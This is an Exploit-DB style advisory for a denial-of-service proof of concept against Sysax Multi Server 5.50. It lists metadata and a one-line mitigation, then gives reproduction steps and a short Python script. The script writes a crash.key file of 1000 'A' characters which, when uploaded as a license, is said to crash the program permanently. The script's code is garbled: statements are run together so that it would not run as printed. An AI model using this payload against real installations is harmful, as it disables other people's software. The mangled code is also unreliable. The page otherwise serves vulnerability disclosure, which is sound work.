Sysax Multi Server 5.50 - Denial of Service (PoC)

vendor:

Sysax Multi Server

by:

Shailesh Kumavat

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Sysax Multi Server

Affected Version From: Sysax Multi Server 5.50

Affected Version To: Sysax Multi Server 5.50

Patch Exists: YES

Related CWE: NA

CPE: a:sysax:sysax_multi_server:5.50

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7

2020

Sysax Multi Server 5.50 – Denial of Service (PoC)

A maliciously crafted crash.key file can cause a denial of service in Sysax Multi Server 5.50 when uploaded to the software. The software will crash and never run again.

Mitigation:

Ensure that the software is updated to the latest version and that all files uploaded to the software are from trusted sources.

Source

Exploit-DB raw data:

# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC)
# Google Dork: NA
# Date: 2020-01-20
# Exploit Author: Shailesh Kumavat
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download.htm#sysaxserv
# Version: Sysax Multi Server 5.50
# Tested on: WIndow 7
# CVE : [if applicable]

1) Download software install in window 7
2)run software then click install license
3) upload crash.key file and it will show run again this program
4 ) program crash , never run


#!/usr/bin/python

buffer = "A" * 1000

payload = buffertry:
    f=open("crash.key","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")except:
    print("File cannot be created.")